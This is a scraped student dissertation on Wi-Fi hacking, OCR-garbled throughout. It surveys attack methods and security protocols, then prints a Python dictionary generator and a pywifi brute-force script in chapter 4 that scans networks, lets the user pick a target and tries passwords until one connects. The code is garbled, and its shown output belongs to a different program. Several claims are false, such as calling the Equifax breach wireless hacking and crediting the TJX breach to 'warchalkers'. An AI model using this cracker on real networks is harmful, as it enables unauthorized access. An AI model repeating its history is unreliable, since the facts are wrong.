Project File (Wireless Network Hacking)

You might also like

Download as pdf
Download as pdf
You are on page 1of 51
uféa ua. un. gaet faufaeres, sedla, Hea WaRT Pandit S. N. Shukla University, Shahdol,M.P. WIRELESS NETWORK HACKING A DISSERTATION SUBMITTED IN THE PARTIAL FULFILLMENT OF REQUIREMENT FOR THE AWARD OF BACHELOR OF SCIENCE IN COMPUTER SCIENCE SUBMITTED TO Pandit Shambhunath Shukla University Shahdol (M.P.) SUBMITTED BY:- Sameer Das Roll No. 21091089 UNDER THE GUIDANCE OF :- Dr.Gauri shanker Kushwaha DEPARTMENT OF COMPUTER SCIENCE Pandit Shambhunath Shukla University ‘Shahdol (M.P.) uféa ua. uF. geet faufaeras, sedla, Hea WaRT Pandit S. N. Shukla University, Shahdol,M.P. CANDIDATE'S DECLARATION |, SAMEER DAS, student of Bachelor of Computer Science, Pandit S. N. Shukla University, Shahdol, hereby declare that the work presented in the dissertation entitled “WIRELESS NETWORK HACKING” is the outcome of own Bonafide work, which is correct to the best of my knowledge and this work has been carried out taking care of computer science ethics. The work presented does not infringe any previous work and has not been submitted to any University for the award of any degree/diploma Sameer Das (121091089) uféa ua. uF. gaet faufaeraa, edie, Hea WaRT Pandit S. N. Shukla University, Shahdol,M.P. DECLARATION | hereby declare that the work which is being presented in the dissertation entitled "WIRELESS NETWORK HACKING" in the partial fulfillment of the requirements for the award of degree of Bachelor of Computer Science in Pandit Shambhunath Shukla University, Shahdol submitted to the department of Computer Science is an authentic record of my own work carried under the guidance of Assistant Prof. Dr. Gauri Shanker Kushwaha, Department of Computer Science. | have not submitted the matter embodied in this report for the award of any other degree. Supervisor SAMEER DAS (121091089) Head of the Department Department of Computer Science uféa ua. un. gaet faufaerea, sedla, Hea Weer Pandit S. N. Shukla University, Shahdol,M.P. CERTIFICATE This is to certify that the work entitled “WIRELESS NETWORK HACKING” is a bonafide research work carried out independently by Sameer Das, student of Bachelor of Computer Science in Pandit Shambhunath Shukla University, Shahdol. In the partial fulfillment of the requirement for the award of the degree of Bachelor of Computer Science and this dissertation has not formed previously the basis for the award of any degree, diploma, associateship or any other similar title according to our knowledge Guided By: Dr Gauri Shanker Kushwaha (Assistant Professor) Head of the Department:-Pramod Pandey Department of Computer Science uféa Ua. un. gaet faufaeres, sedla, Hea WaRT Pandit S. N. Shukla University, Shahdol,M.P. APPROVAL CERTIFICATE The dissertation work entitled “WIRELESS NETWORK HACKING” being submitted by Mr. Sameer Das (121091089) has been examined by us and is hereby approved for the award of Bachelor of Computer Science in Pandit Shambhunath Shukla University, Shahdol. (Internal Examiner) (External Examiner) Date: Date: uféa wa. un. aaen faufaare, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. ACKNOWLEDGEMENT | take the opportunity to express my cordial gratitude to Dr. Gauri Shanker Kushwaha sir, Associate Professor in the Department of Computer Science . Pandit S. N. Shukla University, Shahdol for the valuable guidance and inspiration ‘throughout the dissertation work | feel thankful for his innovative ideas, which led to successful completion of this work. | give special thanks to Prof. Pramod Pandey sir, Prof. & Head of Department of Computer Science, Pandit S. N. Shukla University, Shahdol, to always being willing to help find solutions to any problems | had with my work lextend my deepest gratitude to Dr. Manish Taram, Assistant professor, Pandit S.N. Shukla University, Shahdol for providing all the necessary facilities and true encouraging environment to bring out the best of my endeavors. | express my gratitude and thanks to all the staff members of Department of Computer Science for supporting my work and providing me the proper guidance during my work. | would like to thank my friends. | am also thankful to my classmates for all the thoughtful and mind stimulating discussions we had, which prompted us to think beyond the obvious. SAMEER DAS (121091089) ‘py Uiea wa. uF. ween faafaarea, edit, Hea WeRT Pandit S. N. Shukla University, Shahdol,M.P. TABLE OF CONTENTS CHAPTER-1 INTRODUCTION 1-9 1.17 INTRODUCTION OF WIRELESS NETWORK HACKING 1-3 1.2 ANALYSIS OF WIRELESS NETWORK HACKING 4-6 1.3 METHODS OF WIRELESS NETWORK HACKING a” CHAPTER-2 LITERATURE REVIEW AND PREVIOUS WORK 30°88 1.1 LITERATURE REVIEW i737 1.2 PREVIOUS WORK CHAPTER-3 PROBLEM STATEMENT AND PROPOSED WORK 23-26 1.1 Wireless network security issues and threat | 23-24 1.2 Basic WLAN security features 44-26 CHAPTER-4 SIMULATION AND 37-40 RESULT 1.1 DEPENDENCYPYWIFI 27-28 1.2 ATTACK WIFI WITH PYTHON ee CHAPTER-5 CONCLUSION ara CHAPTER-6 FUTURE WORK 43-44 uféa wa. uf. ween faufaarea, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. CHAPTER-1 INTRODUCTION 1.1 Introduction of Wireless Network Hacking Wreless local-area networks — often referred to as WLANs or Wi-Fi networks — are all the rage these days. People are installing them in their offices, hotels, coffee shops, and homes. Seeking to fulfill the wireless demands, Wi-Fi product vendors and service providers are popping up just about as fast as the dot-coms of the late 1990s. Wireless networks offer con- venience, mobility, and can even be less expensive to implement than wired networks in many cases. uféa wa. us. geen faufaarea, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. Given the consumer demand, vendor solutions, and industry standards, wireless-network technology is real and is here to stay. But how safe is this technology? Wireless networks are based on the Institute of Electrical and Electronics Engineers (IEEE) 802.11 set of standards for WLANs. In case you've ever wondered, the IEEE 802 standards got their name from the year and month this group was formed — February 1980. The “.11” that refers to the wireless LAN working group is simply a subset of the 802 group. There’s a whole slew ofindustry groups involved with wireless networking, but the two main players are the IEEE 802.11 working group and the Wi-Fi Alliance. uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. Years ago, wireless networks were only a niche technology used for very spe-cialized applications. These days, Wi-Fi systems have created a multibillion-dollar market and are being used in practically every industry and in every size organization from small architectural firms to the local zoo.But with this increased exposure comes increased risk: The widespread use of wireless systems has helped make them a bigger target than the IEEE ever bargained for. (Some widely publicized flaws such as the Wired Equivalent Privacy (WEP) weaknesses in the 802.11 wireless-network protocol haven't helped things,either.) And, as Microsoft has demonstrated, the bigger and more popular you are, the more attacks you're going to receive. uféa wa. us. ween faufaare, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. 1.2 Analysis of Wireless Network Hacking Wireless network hacking refers to the process of gaining unauthorized access to a wireless network.This can be done through various methods, such as cracking the network password, exploiting vulnerabilities in the wireless router, or using tools such as packet sniffers and network analyzers to intercept and manipulate network traffic. Wireless network hacking can have serious consequences, including data theft, identity theft, and damage to the network infrastructure. uféa wa. ua. ween faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. It is illegal and can result in criminal charges and significant fines. To prevent wireless network hacking, it is important to take certain measures, such as: e Using strong passwords: Use strong, unique passwords for your wireless network and change them regularly. e Keeping software up-to-date: Keep your wireless router firmware and operating system updated to ensure that any known vulnerabilities are patched. uféa wa. ua. geen faufaare, sedi, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. e Disabling unnecessary features: Disable any unnecessary features on your wireless router, such as remote access or guest networks, which can be exploited by hackers. e Using encryption: Use encryption such as WPA2 or WPA3 to secure your wireless network. e Limiting signal range: Adjust the signal range of your wireless network to minimize the risk of unauthorized access from outside your premises. uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. 1.3 Methods of Wireless Network Hacking 1. Password cracking: This involves using tools to guess or crack the wireless network password. This can be done using brute- force attacks, dictionary attacks, or other methods to try out different passwords until the correct one is found. 2. Rogue access points: An attacker can set up a rogue access point with a similar name to a legitimate wireless network to trick users into connecting to it. Once connected, the attacker can intercept network traffic and steal sensitive information. uféa wa. ua. ween faufaarea, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. 3. Packet sniffing: This involves capturing and analyzing network traffic to identify login credentials, passwords, and other sensitive information. 4. WEP/WPA cracking: Older wireless networks use WEP (Wired Equivalent Privacy) or WPA (Wi-Fi Protected Access) encryption, which can be vulnerable to cracking if the attacker has enough resources and time. 5. Man-in-the-middle attacks: = This involves intercepting and altering network traffic between the user and the wireless network, uféa wa. ua. geen faufaarea, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. allowing the attacker to steal sensitive information or inject malware into the victim's device. 6. Denial of Service (DoS) attacks: This involves flooding the wireless network with traffic, causing it to become unavailable or crash, preventing legitimate users from accessing it. 7. Wireless jamming: This involves using specialized equipment to jam or disrupt wireless signals, preventing legitimate users from accessing the network. uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. Chapter-2 The KirtiRaj Bhatele, et al., presented hybrid security protocol for better security using a combination of both symmetric and asymmetric cryptographic algorithms. In this hash value of the decrypted message using AES algorithm is calculated using MD5 algorithm. This hash value has been encrypted with dual RSA and the encrypted message of this hash value also sent to destination. Now at the receiving end, hash value of decrypted plaintext is calculated with MDS and then it is compared with the hash value of original plaintext uféa wa. ua. geen faufaare, sedis, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. which is calculated at the sending end for its integrity. By this we are able to know whether the original text being altered or not during transmission in the communication medium.Arash Habibi Lashkari, et al.,presented a survey on wireless security protocols (WEP, WPA and WPA2/802.11i). Here WEP protocol types, weaknesses and enhancements, WPA protocol types, WPA improvements such as cryptographic message integrity code or MIC, new IV sequencing discipline, per packet key mixing function and rekeying mechanism. They also explained major problems on WPA that happened on PSK part of algorithm. uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. Finally paper explained third generation of wireless security protocol as WPA2/802.11i.Gamal Selim, et al., [9] explained various types of security attacks modification, fabrication, interception, brute force, maintainability and static placement of MIC. They surveyed currently available security protocols i.e. WEP, WEP2, WPA and WPA2. They also proposed a new mechanism called multiple slot system (MSS). MSS makes use of the key selector, slot selector and MIC shuffle selector. MSS uses one of four encryption algorithm RC4, RSA, Blowfish and AES.Hyung- Woo Lee, et al., uféa wa. ua. geen faufaare, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. explained various issues and challenges in wireless sensor network. Paper explained two types of wireless security attacks — one is the attack against the security mechanisms and another is against the basic mechanisms like routing mechanism. Major attacks explained are denial of service attack, attacks on information in transit, sybil attack, hello flood attack, wormhole attack, blackhole/sinkhole attack. Paper also explainedthe various security schemes for wireless sensor networks like wormhole based, statistical en-route filtering, random key and tinysec. Holistic view of security in wireless uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. sensor networks is also described.Lifeng Sang, et al., proposed shared secret free security infrastructure for wireless networks based on two physical primitives: cooperative jamming and spatial signal enforcement. Cooperative jamming is for confidential wireless communication and spatial signal enforcement is for message authenticity. Proposed infrastructure provides confidentiality, identity authentication, message authentication, integrity, sender non-repudiation, receiver non tepudiation and anonymity.Andrew Gin, et al., compared the performance analysis of evolving wireless 802.11 security architecture. Paper explained wireless network security methods. uféa wa. ua. geen faufaare, sedis, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. Paper explained security layers like WEP shared key authentication and 40 bit encryption, WEP shared key authentication and 104 bit encryption, WPA with PSK authentication and RC4 encryption, WPA with EAP-TLS authentication and RC4 encryption, WPA2 with PSK authentication and AES encryption and WPA2 with EAP-TLS authentication and AES encryption. Effects on throughput are also discussed.Eric Sabbah, et al., [13] explained attacker motivation, vulnerabilities | and opportunities currently available to hackers. Wireless sensor networks are exposed to numerous security threats that can endanger the success of the application. uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. Paper explains that security supports in wireless network is challenging due to the limited energy, communication bandwidth and computational power. Security issues and currently available solutions, various types of attacks like - attacks on routing and DoS attack, injecting false packets, attacks on real time requirements, attacks on the network using topological information, attacks on localization. Floriano De Rango et. al.,proposed static and dynamic 4 - way handshake solutions to avoid denial of service attack in WPA and IEEE 802.111. Paper also explained DoS and DoS flooding attacks against IEEE 802.111 4-way handshake. uféa wa. ua. geen faufaare, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. Paper also compared static versus dynamic resource oriented solutions for the 4 way handshake.Stephen Michell, et al., proposed state based key hope protocol (SBKH) that provides a lightweight encryption scheme for battery operated devices such as the sensors in a wireless sensor network as well as small office, home office (SOHO) users. State based key hope protocol implements encryption in a novel state based way so as to provide cheap and robust security without additional overheads of encryption. Implementation of SBKH on real hardware is a challenge uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. Previous wort Wireless network hacking involves gaining unauthorized access to wireless networks, such as Wii, Bluetooth, and cellular networks. This type of hacking is typically used for malicious purposes, such as stealing sensitive information, disrupting network services, or launching attacks on other devices. One of the most well-known wireless network hacking incidents occurred in 2017 when hackers exploited a vulnerability in the Equifax web application to gain access to personal information of millions of people. uféa wa. ua. geen faufaare, sedis, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. The hackers were able to steal names, Social Security numbers, birth dates, and other sensitive information. Another notable example is the 2014 Sony Pictures hack, where a group of hackers known as "Guardians of Peace" breached the company's network and stole sensitive data, including unreleased films, confidential documents, and employee information. A4Wireless network hacking can be accomplished using various methods. One of the most common is a brute force attack, uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. which involves trying numerous combinations of usernames and passwords until the correct one is found. This method is often successful when users have weak passwords or when the — network administrator has not enforced password policies. One of the most famous cases of wireless network hacking occurred in 2005, when a group of hackers known as_ the "warchalkers" gained unauthorized access to a wireless network belonging to the retailer TJX Companies. uféa wa. ua. geen faufaare, sedis, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. The group was able to steal data from the company's computer systems, including credit card information from millions of customers. The incident is considered one of the largest data breaches in history and resulted in millions of dollars in damages. Wireless network hacking continues to be a major threat to organizations and individuals alike. Hackers are constantly developing new techniques and exploits to gain unauthorized access to wireless networks. As a result, uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. it is important for organizations and individuals to take steps to protect themselves against these threats. This includes using strong passwords, keeping software and firmware up-to-date, and using encryption to protect data transmitted over wireless networks. Additionally, organizations should consider using network security tools, such as firewalls and intrusion detection systems, to help identify and prevent attacks. uféa wa. ua. ween faufaare, sedis, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. CHAPTER - 3 PROBLEM STATEMENT Wireless network security issues and threat The three most common WLAN security threats include: 1.denial of service attacks - where the intruder floods the network with messages affecting the availability of the network resources 2.spoofing and session hijacking - where the attacker gains access to network data and resources by assuming the identity of a valid user uféa wa. ua. ween faufaarea, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. 3.eavesdropping - where unauthorised third parties intercept the data being transmitted over the secure network To counter these threats, you should make every effort to configure your WLAN correctly. You should also enable a range of security features, such as standard authentication and encryption, alongside other access control mechanisms. Proposed work Basic WLAN security features 1.Early WLAN hardware used a number of basic security methods, including: uféa wa. ua. geen faufaarea, sedia, Fea eet Pandit S. N. Shukla University, Shahdol,M.P. 2.Service Set Identifiers (SSIDs) - these prevent connection to access points unless a device uses a given identifier correctly 3.Media Access Control (MAC) - this involves using addresses attached to each device to limit connection to access points 4.Wired Equivalent Privacy (WEP) - WEP uses encryption keys so that only devices with the correct key can communicate with access points WEP still exists in many devices as users have found compatibility problems when introducing new equipment. uféa wa. ua. ween faufaarea, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. However, WEP has been proven ineffective against hackers. You should consider upgrading any devices relying on this technology. Even with all these security measures combined, basic WLAN features cannot guarantee that your network will remain secure. What is more, WLAN equipment often comes with security measures switched off entirely. If you don't switch these on, then you have absolutely no security at all. uféa wa. ua. aaen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. Chapter-4 STIMULATION AND RESULT 1.1 Dependency pywifi pywifi provides a cross-platform Python module for manipulating wireless interfaces. Easy to use; Supports Windows and Linux. Construct a wifi dictionary Including numbers (0-9), letters (a-z, A-Z), special characters (|@#$%"&*()_+=-) A normal password consists of 8 characters with only numbers and small letters so we could pick any random combination of those and store them in to a .text file. uféa wa. ua. geen faufaare, sedis, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. A normal password consists of 8 characters with only numbers and small letters so we could pick any random combination of those and store them in to a .text file. import itertools as its words = "1234567890abcdefghijklmnopqrstuvwxyz" # a set of password characters rt =its.product(words,repeat=8) # random combination of 8 characters dic = open("pwd.txt’,a’) # store wifi combinations in file foriinr: dic.write(""join(i)) dic.write(".join("\n")) dic.close() ufea Ua. Us. xiao faafaenea, wedie, Het Wer Pandit S. NC Shukla University, Shahdol,M.P. 3.2 Attack Wifi with Python create a file main.py import pywifi import time from pywifi import const # WiFi scanner def wifi_scan(): # initialise wifi wifi = pywifi.PyWiFi() # use the first interface interface = wifi.interfaces()[0] # start scan interface.scan() fori in range(4): time.sleep(1) uféa wa. ua. geen faufaare, sedis, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. print(\rScanning WiFi, please wait... (' + str(3 - i), end=') ') print(‘\rScan Completed! \n' + -' * 38) print(\r:4}{:6}}'.format(No.’, ‘Strength’, ‘wifi name’) # Scan result, scan_results() returns a set, each being a wifi object bss = interface.scan_results() # a set storing wifi name wifi_name_set = set() for w in bss: # dealing with decoding wifi_name_and_signal = (100 + w.signal, w.ssid.encode(‘raw_unicode_escape’).decode(‘u tf-8')) uféa wa. ua. ween faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. wifi_name_set.add(wifi_name_and_signal) # store into a list sorted by signal strength wifi_name_list = list(wifi_name_set) wifiname_list = — sorted(wifi_name_iist, key=lambda a: a[0], reverse=True) num = 0 # format output while num < len(wifi_name_list): print(\r{:<6d}{:<8d}{}'.format(num, wifi_name_list[num][0], wifi_name_list[num][1])) num += 1 print(- * 38) # return wifi list return wifi_name_list # WIFI cracking function def wifi_password_crack(wifi_name): uféa wa. ua. geen faufaare, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. # password dictionary file wifi_dic_path = input("Please use filename of password dictionary used for the brute force attack: ") with open(wifi_dic_path, 'r’) as f: # loop through all combinations for pwd in f: # strip of the trailing new line character pwd = pwd.strip(‘\n’) # initialise wifi object wifi = pywifi.PyWiFi() # initialise interface using the first one interface = wifi.interfaces()[0] # disconnect all other connections interface.disconnect() uféa wa. ua. aaen faufaare, sedia, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. # waiting for all disconnection to complete while interface.status() == 4: # break from the loop once all disconnection complete pass # initialise profile profile = pywifi.Profile() # wifi name profile.ssid = wifi_name # need verification profile.auth = const.AUTH_ALG_OPEN # wifi default encryption algorithm profile.akm.append(const.AKM_TYPE_WPA2PS K) uféa wa. ua. ween faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. profile.cipher = const.CIPHER_TYPE_CCMP # wifi password profile.key = pwd # remove all wifi connection profiles interface.remove_all_network_profiles() # set new wifi connection profile tmp_profile = interface.add_network_profile(profile) # attempting new connection interface.connect(tmp_profile) start_time = time.time() while time.time() - start_time < 1.5: # when interface connection status is 4, it succeeds # greater than 1.5s normally means the connection failed uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. # normal successful connection is completed in 1.5s # increase the timer to increase the accuracy at the cost of slower speed if interface.status() == 4: print(f\rConnection Succeeded ! Password: {pwd}') exit(0) else: print(f'\rTrying with {pwd}', end=") # main execution function def main(): # exit signal exit_flag = 0 uféa wa. un. geen faufaare, edit, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. # target number target_num = -1 while not exit_flag: try: print(WiFi keys'.center(35, -’)) # use the scanner module , to get a sorted wifi list wifi_list = wifi_scan() # let the user pick the wifi number, and handle error cases choose_exit_flag = 0 while not choose_exit_flag: uféa wa. ua. geen faufagrea, edie, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. try: targetnum = __ int(input(‘Please choose a target wifi: ')) # choose wifi in the list, go into second confirmation or ask for input again if target_num in range(len(wifi_list)): # double-confirm while not choose_exit_flag: try: choose = _ str(input(f'The chosen target wifi is {wifi_list[target_num][1]}, Sure? (Y/N) ')) uféa wa. ua. aaen faufagrea, edie, Fea Weer Pandit S. N. Shukla University, Shahdol,M.P. # lower case the confirmation input if choose.lower() == 'y: choose_exit_flag = 1 elif choose.lower() == 'n’: break # exception handling else: print(only Y/N pls! o(* — ~ *)o+) # exception handling except ValueError: ~~ print(‘only Y/N pls! o(* *)o’) uféa wa. un. geen faufaarea, edie, Fea WeRT Pandit S. N. Shukla University, Shahdol,M.P. # exit if choose_exit_flag == 1: break else: print(Please choose a_ target wifi: ') except ValueError: print(Please only enter a number: ') # start cracking, use the chosen wifi name wifi_password_crack(wifi_list[target_num]|1]) print(’-' * 38) exit_flag = 1 uféa wa. us. aaen faufaare, edie, Fea Weer Pandit S. N. Shukla University, Shahdol,M.P. except Exception as e: print(e) raise e if __name_ =='_main_': main() Qutput Enter 1st number : Enter 2nd number: uféa wa. ua. ween faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. Chapter-5 CONCLUSTON e WEP has a long history of vulnerabilities and "fixes" e WEP is a good example of how attacks evolve and mature over time e Attacks that a few years ago took days, now take minutes if the right tools are used uféa wa. ua. aaen faufaarea, sedis, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. e 2005 WEP is officially declared deprecated by IEEE 802.11 committee e 2008 WEP used by 30% of users in US University e Today - too many old networks, some using WEP e WEP must be abandoned once and for all, rather than patch it yet again !! uféa wa. ua. geen faufaare, sedis, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. Chapter-6 ulure work, Wireless Network Hacking Future future work in wireless network hacking may include: 1.The use of machine learning algorithms and artificial intelligence to automate and optimize the process of hacking wireless networks. 2.The development of new attack vectors, such as_ exploiting vulnerabilities in emerging wireless technologies like 5G and the Internet of Things (loT). uféa wa. ua. geen faufaare, sedia, Fea weet Pandit S. N. Shukla University, Shahdol,M.P. 3.The exploration of new attack surfaces beyond traditional wireless networks, such as Bluetooth and Near Field Communication (NFC). 4.The development of new techniques for bypassing network defenses, such as encryption and authentication protocols. 5. The use of social engineering and other non- technical tactics to gain access to wireless networks, such as phishing and pretexting

You might also like